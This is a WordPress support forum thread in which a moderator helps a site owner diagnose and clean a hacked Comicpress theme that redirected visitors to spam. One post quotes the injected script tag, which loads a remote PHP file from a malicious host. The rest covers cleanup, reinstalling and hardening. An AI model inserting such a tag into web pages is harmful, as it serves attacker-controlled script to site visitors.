WordPress.org

Ready to get started?Download WordPress

Forums

Spam redirect / Accidentally hid wp-admin style? (13 posts)

  1. eightprint
    Member
    Posted 2 years ago #

    Just spent a lot of time trying to fix a frustrating spam redirect that was happening when people accessed my WordPress (Comicpress) site from certain browsers. I removed a long amount of jibberish code in comicpress's footer.php that seemed to be the culprit, and I believe that stopped it.

    However, I'm pretty new to this, and in trying to fix that problem I created another. I changed the permissions of the comicpress theme directory in my FTP, and after doing so my site looks fine outwardly, but the admin panel has been stripped of its styles... (Screenshot: http://i39.tinypic.com/10g9ysx.png) I tried changing the permissions back but it did not regain its styles... I have not touched anything else.

    Questions:

    1. How can I ensure that my footer.php and other files are not hijacked with spam redirects in the future?
    2. How to I get the styles back on my admin panel?

    If it's needed, my site is http://www.eightprint.com. Thank you for reading!

  2. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    You are still hacked. This code, <script src="xxx://dph00illi.rr.nu/nl.php?p=d"></script> is the last script in your source code. I changed html to xxx.

    [edit]
    Next you need to read and do all this, http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    http://sitecheck.sucuri.net/scanner/

  3. eightprint
    Member
    Posted 2 years ago #

    Thank you! Can I ask what browser you're using and what happened?

    I viewed my page's source but could not find the line you mentioned. All I found was some more gibberish code at the start of header.php, which I removed.

    [edit]
    And thank you for the links. Reading now.

  4. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    Nothing happened. I looked at the code in IE9. I have since checked in FF and Chrome but do not see it. I am working on it now.

  5. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    And now the site is down so I have no way to troubleshoot.

  6. eightprint
    Member
    Posted 2 years ago #

    Sorry about that. Was changing my passwords but it should be back up now.

    I changed my WP keys and am looking through all my php files for that same gibberish code.

  7. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    Check your robots.txt file for the script.

  8. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    I cannot see the script in FF or Chrome. I can see it in IE.
    ismysiteworking see the script in the robots.txt file and surcuri see it it many locations.

    I would like to know how IE sees it yet it is hidden from other browsers but I think the main point to all is to use multiple sources to check sites for intrusions.

  9. eightprint
    Member
    Posted 2 years ago #

    I see that too. Viewing source in IE does show the script line, but not in any other browser. Odd.

    I looked for robots.txt but could not find the file. Isn't it usually located in the main directory? Couldn't find it anywhere.

    In going over the links you posted, I realized when resetting my WP keys that I never set them in the first place. They were left in wp-config as the default "put wordpress key here"... I'm guessing that's the kind of obvious newbie error that would lead to something like this happening. (sigh.)

    Thank you so much for your help and patience. Since every file I've looked at seems to have the code, and I'm not sure about robots.txt, would it just be easier to reinstall from scratch and set the WP keys properly? My site is pretty new, without any visitors. There's only a few posts so it wouldn't be difficult to redo.

  10. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    Notify your host about the virus as it more than likely came from a shared server.

    A complete reinstall would be good. Kill every file and the database.
    Check your own computer also as sometimes the virus comes from there.
    Read hardening wordpress as you can take some of the suggested steps like changing the wp_ prefix during the new install.

  11. eightprint
    Member
    Posted 2 years ago #

    Finished with the reinstall! http://www.eightprint.com

    I believe I am secure according to sucuri... IE seems to take things okay.

    Thank you so much!

  12. heypedro
    Member
    Posted 2 years ago #

    ah no! Same thing has happened to me :(

  13. MickeyRoush
    Member
    Posted 2 years ago #

    I cannot see the script in FF or Chrome. I can see it in IE.
    ismysiteworking see the script in the robots.txt file and surcuri see it it many locations.

    I would like to know how IE sees it yet it is hidden from other browsers but I think the main point to all is to use multiple sources to check sites for intrusions.

    Maybe because IE XSS filters are disabled by default. That's just a guess though.

    And that is definitely a XSS script.

Topic Closed

This topic has been closed to new replies.

About this Topic